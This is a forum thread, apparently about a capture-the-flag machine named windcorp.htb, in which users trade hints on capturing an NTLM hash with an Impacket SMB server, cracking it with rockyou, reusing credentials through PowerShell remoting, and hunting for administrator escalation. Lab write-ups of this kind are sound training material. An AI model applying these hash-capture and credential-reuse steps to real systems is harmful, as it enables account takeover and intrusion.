Posts: 213 Threads: 0 Joined: N/A September 22, 2022 at 4:54 PM (September 22, 2022, 02:58 PM)Mr_Unkn0wn Wrote: [*] Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (192.168.0.2,60902)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*]AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*]User HOPE\scriptrunner authenticated successfully
[*]scriptrunner::WINDCORP:a******hash_here***** [*] Thanks for your hints. Are any specific command line arguments necessary? I tested them all, but I only get this: [2022-09-22 18:50:53] [*] Incoming connection (192.168.0.2,58633)
[2022-09-22 18:50:53] [-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[2022-09-22 18:50:53] [*] Closing down connection (192.168.0.2,58633)
Posts: 213 Threads: 0 Joined: N/A September 22, 2022 at 5:34 PM (September 22, 2022, 05:09 PM)Hacker2222 Wrote: (September 22, 2022, 04:54 PM)Exa Wrote: (September 22, 2022, 02:58 PM)Mr_Unkn0wn Wrote: [*] Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (192.168.0.2,60902)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*]AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*]User HOPE\scriptrunner authenticated successfully
[*]scriptrunner::WINDCORP:a******hash_here*****
[*]
Thanks for your hints. Are any specific command line arguments necessary? I tested them all, but I only get this:
[2022-09-22 18:50:53] [*] Incoming connection (192.168.0.2,58633)
[2022-09-22 18:50:53] [-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[2022-09-22 18:50:53] [*] Closing down connection (192.168.0.2,58633)
[*]
u use smb2support ? [*]Yes: /root/smbserver_linux_x86_64 -smb2support MYSHARE /tmp
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,58840)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] Closing down connection (192.168.0.2,58840)
[*] Remaining connections []
Posts: 213 Threads: 0 Joined: N/A September 22, 2022 at 5:55 PM (September 22, 2022, 05:39 PM)Hacker2222 Wrote: hmm. ..... maybe not use the dev version ? also access share with webserver.windcorp.htb not ip .... Using \\webserver.windcorp.htb\MYSHARE\ instead of \\webserver\MYSHARE\ did the trick! The hash can be cracked using the rockyou wordlist. Posts: 78 Threads: 0 Joined: N/A September 22, 2022 at 9:33 PM (September 22, 2022, 05:39 PM)Hacker2222 Wrote: (September 22, 2022, 05:34 PM)Exa Wrote: (September 22, 2022, 05:09 PM)Hacker2222 Wrote: (September 22, 2022, 04:54 PM)Exa Wrote: (September 22, 2022, 02:58 PM)Mr_Unkn0wn Wrote: [*] Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (192.168.0.2,60902)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*]AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*]User HOPE\scriptrunner authenticated successfully
[*]scriptrunner::WINDCORP:a******hash_here*****
[*]
Thanks for your hints. Are any specific command line arguments necessary? I tested them all, but I only get this:
[2022-09-22 18:50:53] [*] Incoming connection (192.168.0.2,58633)
[2022-09-22 18:50:53] [-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[2022-09-22 18:50:53] [*] Closing down connection (192.168.0.2,58633)
[*]
u use smb2support ?
[*]Yes:
/root/smbserver_linux_x86_64 -smb2support MYSHARE /tmp
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,58840)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] Closing down connection (192.168.0.2,58840)
[*] Remaining connections []
[*]hmm. ..... maybe not use the dev version ? also access share with webserver.windcorp.htb not ip .... [*] ye, using the non-dev version worked for me. on to the next step, hope this is the final.... Posts: 1 Threads: 0 Joined: N/A September 22, 2022 at 9:37 PM Hello My Friends Happy to meet you Posts: 44 Threads: 0 Joined: N/A September 22, 2022 at 10:18 PM you could've also use https://github.com/xct/hashgrab + responder or https://github.com/Plazmaz/LNKUp This is where I'm right now.Trying to figure out how to connect with creds. PS C:\> $username = 'HOPE\Bob.Wood'
PS C:\> $passwd = ConvertTo-SecureString "passwdwd" -AsPlainText -Force
PS C:\> $creds = New-Object System.Management.Automation.PSCredential $username, $passwd
PS C:\> Invoke-Command -ComputerName HOPE -Credential $creds -ConfigurationName dc_manage -ScriptBlock {whoami}
[HOPE] Connecting to remote server HOPE failed with the following error message : Access is
denied. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (HOPE:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\> Invoke-Command -Credential $creds -ConfigurationName dc_manage -ScriptBlock {whoami}
Invoke-Command : Parameter set cannot be resolved using the specified named parameters.
+ Invoke-Command -Credential $creds -ConfigurationName dc_manage -Scrip ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-Command], ParameterBindingException
+ FullyQualifiedErrorId : AmbiguousParameterSet,Microsoft.PowerShell.Commands.InvokeCommandCommand
tried wmiexec.py as well.. something probably I'm doing wrong.. Posts: 44 Threads: 0 Joined: N/A September 22, 2022 at 10:40 PM (September 22, 2022, 10:29 PM)Hacker2222 Wrote: (September 22, 2022, 10:18 PM)onl1_f4ns Wrote: you could've also use https://github.com/xct/hashgrab + responder
or https://github.com/Plazmaz/LNKUp
This is where I'm right now.Trying to figure out how to connect with creds.
PS C:\> $username = 'HOPE\Bob.Wood'
PS C:\> $passwd = ConvertTo-SecureString "passwdwd" -AsPlainText -Force
PS C:\> $creds = New-Object System.Management.Automation.PSCredential $username, $passwd
PS C:\> Invoke-Command -ComputerName HOPE -Credential $creds -ConfigurationName dc_manage -ScriptBlock {whoami}
[HOPE] Connecting to remote server HOPE failed with the following error message : Access is
denied. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (HOPE:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\> Invoke-Command -Credential $creds -ConfigurationName dc_manage -ScriptBlock {whoami}
Invoke-Command : Parameter set cannot be resolved using the specified named parameters.
+ Invoke-Command -Credential $creds -ConfigurationName dc_manage -Scrip ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-Command], ParameterBindingException
+ FullyQualifiedErrorId : AmbiguousParameterSet,Microsoft.PowerShell.Commands.InvokeCommandCommand
tried wmiexec.py as well.. something probably I'm doing wrong.
account is domain username .... domain isn't hope. prob change that yep.. you're right PS C:\windows\asd\asd> Invoke-Command -ComputerName HOPE -Credential $creds -ScriptBlock {whoami}
Invoke-Command -ComputerName HOPE -Credential $creds -ScriptBlock {whoami}
windcorp\bob.wood
Posts: 78 Threads: 0 Joined: N/A September 23, 2022 at 12:58 AM (September 22, 2022, 09:33 PM)meowmeowattack Wrote: (September 22, 2022, 05:39 PM)Hacker2222 Wrote: (September 22, 2022, 05:34 PM)Exa Wrote: (September 22, 2022, 05:09 PM)Hacker2222 Wrote: (September 22, 2022, 04:54 PM)Exa Wrote: [*]
Thanks for your hints. Are any specific command line arguments necessary? I tested them all, but I only get this:
[2022-09-22 18:50:53] [*] Incoming connection (192.168.0.2,58633)
[2022-09-22 18:50:53] [-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[2022-09-22 18:50:53] [*] Closing down connection (192.168.0.2,58633)
[*]
u use smb2support ?
[*]Yes:
/root/smbserver_linux_x86_64 -smb2support MYSHARE /tmp
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,58840)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] Closing down connection (192.168.0.2,58840)
[*] Remaining connections []
[*]hmm. ..... maybe not use the dev version ? also access share with webserver.windcorp.htb not ip ....
[*]
ye, using the non-dev version worked for me.
on to the next step, hope this is the final.... [*] found a password file, could this indicate another round of cracking? C:\Users\Bob.Wood\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt Posts: 44 Threads: 0 Joined: N/A September 24, 2022 at 12:43 AM Any ideas from bob.wood to admin ? I tried GPO, ACLs, some exploits... winpeas... and nothing yet. Anything? I think that is a final step. Also interesting Computer Name : HOPE
User Name : Bob.Wood
User Id : 2761
Is Enabled : True
User Type : User
Comment :
Last Logon : 9/23/2022 3:20:18 AM
Logons Count : 93
Password Last Set : 5/2/2022 12:42:15 PM
Computer Name : HOPE
User Name : bob.woodadm
User Id : 5101
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:43:11 PM
Computer Name : HOPE
User Name : luis.jacksonADM
User Id : 5102
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:44:09 PM
but how to get it.. Posts: 78 Threads: 0 Joined: N/A September 24, 2022 at 1:02 AM (September 24, 2022, 12:43 AM)onl1_f4ns Wrote: Any ideas from bob.wood to admin ? I tried GPO, ACLs, some exploits... winpeas... and nothing yet. Anything?
I think that is a final step. Also interesting
Computer Name : HOPE
User Name : Bob.Wood
User Id : 2761
Is Enabled : True
User Type : User
Comment :
Last Logon : 9/23/2022 3:20:18 AM
Logons Count : 93
Password Last Set : 5/2/2022 12:42:15 PM
Computer Name : HOPE
User Name : bob.woodadm
User Id : 5101
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:43:11 PM
Computer Name : HOPE
User Name : luis.jacksonADM
User Id : 5102
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:44:09 PM
but how to get it.. same here. after going through the journey so far, i feel this box doesn't really involve any technically difficult barrier, but a lot of things are customised in a unfriendly manner. so i bet it would take some time to find out what what's the next customisation. |
